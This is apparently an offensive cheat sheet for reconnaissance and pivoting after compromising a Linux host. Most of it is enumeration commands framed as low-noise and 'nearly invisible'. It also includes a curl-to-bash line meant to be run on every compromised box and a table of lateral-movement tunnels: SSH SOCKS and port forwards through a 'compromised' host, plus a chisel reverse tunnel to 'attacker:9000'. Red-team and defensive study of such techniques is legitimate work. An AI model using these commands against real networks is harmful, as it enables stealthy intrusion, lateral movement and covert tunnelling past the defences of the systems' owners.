Linux Internal Device scan
Phase 1 – Pure Passive (0 packets sent)
# 1. Interfaces + IPs (cleanest view)
ip -br a
# 2. All reachable networks (this is where the real gold hides)
ip route show
# 3. Live hosts the box already talked to
ip neigh show | grep -vE "FAILED|INCOMPLETE"
cat /proc/net/arp
# 4. Internal DNS + static hosts
cat /etc/resolv.conf
cat /etc/hosts | grep -v "^#"
# 5. Quick TL;DR of everything above (run this first 5 seconds)
clear; echo "IFACES"; ip -br a; echo "ROUTES"; ip route; echo "ARP CACHE"; ip neigh | grep -v INCOMPLETE; echo "DNS"; cat /etc/resolv.conf; echo "HOSTS"; cat /etc/hosts
────────────────────────
Phase 2 – Low-Noise Active (still nearly invisible)
# Quiet ARP refresh of entire local subnet(s) – populates cache without nmap
for net in $(ip -4 route | awk '/^[0-9]/ {print $1}'); do
ip=${net%/*}; subnet=$(echo $net | cut -d'/' -f1 | sed 's/\.[0-9]*$/\./')
for i in {1..254}; do (ping -c 1 -W 1 $subnet$i >/dev/null 2>&1 &); done
done; sleep 4; echo "Updated ARP cache:"; ip neigh
────────────────────────
Phase 3 – Hidden Network Discovery (Containers, VPNs, Tunnels)
# Docker / Podman / Containerd
docker network ls 2>/dev/null; docker network inspect $(docker network ls -q) 2>/dev/null | grep -i subnet -A2
podman network ls 2>/dev/null; podman network inspect podman 2>/dev/null | grep -i subnet
# All tunnels & VPN interfaces
ip link show | grep -E "(tun|tap|wg|tailscale|zerotier|zt|veth)" -A1
wg show 2>/dev/null
tailscale status 2>/dev/null
systemctl status openvpn* wireguard* tailscaled zerotier-one 2>/dev/null | cat
# Bonus: Kubernetes / Calico / Flannel if present
cat /etc/cni/net.d/* 2>/dev/null | grep -i subnet || true
────────────────────────
Phase 4 – Outbound Firewall & Pivot Feasibility
# What can this box actually reach?
sudo iptables -L -n -v 2>/dev/null | grep -E "(ACCEPT|DROP)"
sudo nft list ruleset 2>/dev/null | grep -E "ip daddr|accept|drop"
# What services are listening?
echo "External listeners (pivot-in possible)"
ss -tulnpg | grep -v "127.0.0.1\|::1"
echo "Local-only services (great for -L forwarding)"
ss -tulnpg | grep "127.0.0.1\|::1"
────────────────────────
ONE-LINER TO RULE THEM ALL (run immediately on every box)
curl -s <>.sh | bash
# OR copy-paste this monster if you can't curl:
clear; echo -e "\033[1;34m=== INTERFACES ===\033[0m"; ip -br a; echo -e "\n\033[1;34m=== ROUTES (PIVOT TARGETS) ===\033[0m"; ip route; echo -e "\n\033[1;34m=== LIVE HOSTS (ARP) ===\033[0m"; ip neigh | grep -v INCOMPLETE; echo -e "\n\033[1;34m=== DOCKER SUBNETS ===\033[0m"; docker network inspect $(docker network ls -q) 2>/dev/null | grep -i subnet -A2 || echo "none"; echo -e "\n\033[1;34m=== TUNNELS ===\033[0m"; ip link show | grep -E "(tun|tap|wg|tailscale|zerotier)" -A1 || echo "none"; echo -e "\n\033[1;34m=== LISTENING PORTS ===\033[0m"; ss -tulnp
────────────────────────
Instant Pivot Options Once You Pick a Target
| Goal | Command (from your attacker box) |
|---|---|
| SOCKS proxy (browse everything) | ssh -D 1080 user@compromised → proxychains nmap ... |
| One service forward | ssh -L 13306:10.10.5.55:3306 user@compromised |
| Full subnet tunnel | Ligolo-ng / Chisel / sshuttle |
| Fastest reverse tunnel | chisel server -p 9000 --reverse → chisel client attacker:9000 R:1080:socks |